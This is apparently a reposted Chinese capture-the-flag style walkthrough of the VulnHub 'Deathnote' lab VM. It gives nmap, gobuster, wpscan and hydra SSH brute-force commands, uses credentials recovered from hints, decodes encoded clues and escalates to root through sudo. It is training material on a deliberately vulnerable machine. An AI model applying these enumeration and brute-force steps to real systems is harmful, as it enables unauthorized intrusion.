靶场练习No.10 VulnHub靶场Deathnote

admin 2022年5月27日10:02:41评论111 views字数 3627阅读12分5秒阅读模式

靶场练习No.10 VulnHub靶场Deathnote


kali IP: 192.168.43.118

主机发现:sudo nmap -sP 192.168.43.1/24  or sudo nmap -sn 192.168.43.1/24

--> 目标IP:192.168.43.188

端口扫描:nmap -sC -sV -p- 192.168.43.188

--> 开放端口 22 80

22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 5e:b8:ff:2d:ac:c7:e9:3c:99:2f:3b:fc:da:5c:a3:53 (RSA)
|   256 a8:f3:81:9d:0a:dc:16:9a:49:ee:bc:24:e4:65:5c:a6 (ECDSA)
|_ 256 4f:20:c3:2d:19:75:5b:e8:1f:32:01:75:c2:70:9a:7e (ED25519)
80/tcp open http   Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

浏览器访问http://192.168.43.188:80

--> 自动跳转到http://deathnote.vuln/wordpress,无法显示网页

在hosts中绑定ip: 192.168.43.188 deathnote.vuln

--> 网页显示正常,title显示kira

点击HINT 发现提示 -> Find a notes.txt file on server or SEE the L comment

--> L comment:  my fav line is iamjustic3


目录扫描:

gobuster dir -u http://deathnote.vuln/ -w ../seclist/../direct-2.3-m.txt -x php,html.txt

--> robots.txt

fuck it my dad 
added hint on /important.jpg

ryuk please delete it

有一个/important.jpg和一个账号ryuk

浏览器查看http://deathnote.vuln/important.jpg  -> 无内容  -> wget下载

file important.jpg  -> ASCII text

cat important.jpg ->

i am Soichiro Yagami, light's father
i have a doubt if L is true about the assumption that light is kira

i can only help you by giving something important

login username : user.txt
i don't know the password.
find it by yourself
but i think it is in the hint section of site

HINT 的时候获得的信息:L kira iamjustic3 notes.txt

important.jpg获取的信息:Soichiro Yagami user.txt

看到wordpress,可以用wpscan扫描以下
wpscan --url http://deathnote.vuln/wordpress -e u
--url 制定url地址
-e,--enumerate [opts] 枚举 u -> user IDs

--> 扫到一个账号kira

扫描wordpress下的目录:

gobuster dir -u http://deathnote.vuln/wordpress/ -w ../seclist/../direct-2.3-m.txt -x php,html.txt

--> /wp-login.php       发现了登录界面

使用之前获得的信息尝试登录 -> kira:iamjustic3登陆成功

在媒体库中发现了notes.txt,下载下来查看一下内容:

wget http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/notes.txt

cat notes.txt

death4
death4life
death4u
death4ever
death4all
death420
death45
death4love
death49
death48
death456
death4014
1death4u
yaydeath44
thedeath4u2
thedeath4u
stickdeath420
reddeath44
megadeath44
megadeath4
killdeath405
hot2death4sho
death4south
death4now
death4l0ve
death4free
death4elmo
death4blood
death499Eyes301
death498
death4859
death47
death4545
death445
death444
death4387n
death4332387
death42521439
death42
death4138
death411
death405
death4me

是一个密码本。

将之前获得的信息编写一个user.txt:

user.txt:
l
kira
ryuk
soichiro
yagami

尝试爆破ssh :

hydra -L user.txt -P notes.txt ssh://192.168.43.188

--> l:death4me

ssh [email protected]

目录下有一个 user.txt文件

--> cat user.txt

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>+++++.<<++.>>+++++++++++.------------.+.+++++.---.<<.>>++++++++++.<<.>>--------------.++++++++.+++++.<<.>>.------------.---.<<.>>++++++++++++++.-----------.---.+++++++..<<.++++++++++++.------------.>>----------.+++++++++++++++++++.-.<<.>>+++++.----------.++++++.<<.>>++.--------.-.++++++.<<.>>------------------.+++.<<.>>----.+.++++++++++.-------.<<.>>+++++++++++++++.-----.<<.>>----.--.+++..<<.>>+.--------.<<.+++++++++++++.>>++++++.--.+++++++++.-----------------.

是brainfuck加密的,解密后 -->

i think u got the shell , but you wont be able to kill me -kira


找找其他文件,在opt文件夹下有一个L文件夹,查看里面的内容

--> fake-notebook-rule 和 kira-case文件夹

查看fake-notebook-rule文件下的内容:

--> case.wav 和 hint 文件

case.wav是一串十六进制:

63 47 46 7a 63 33 64 6b 49 44 6f 67 61 32 6c 79 59 57 6c 7a 5a 58 5a 70 62 43 41 3d

hint   -> use cyberchef

cyberchef是个加解密网站,用这个网站解密case.wav中的内容

-> from hex: cGFzc3dkIDoga2lyYWlzZXZpbCA=    

-> from base64: passwd : kiraisevil

尝试用这个密码登录kira账户:

su kira

登陆成功

切换到/home/kira目录下,有一个kira.txt

cat kira.txt

--> cGxlYXNlIHByb3RlY3Qgb25lIG9mIHRoZSBmb2xsb3dpbmcgCjEuIEwgKC9vcHQpCjIuIE1pc2EgKC92YXIp


sudo -l   -> 查看kira的权限

--> (ALL:ALL) ALL  可以直接切换到root

sudo su

root获取成功




靶场练习No.10 VulnHub靶场Deathnote
pluck靶机介绍
VulnHub-FristiLeaks: 1.3-Walkthrough
VulnHub-PwnLab-Walkthrough
记一次Tomcat8-弱口令与后台上传getshell的漏洞复现

靶场练习No.10 VulnHub靶场Deathnote


原文始发于微信公众号(北京路劲科技有限公司):靶场练习No.10 VulnHub靶场Deathnote

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月27日10:02:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   靶场练习No.10 VulnHub靶场Deathnotehttp://cn-sec.com/archives/1055293.html

发表评论

匿名网友 填写信息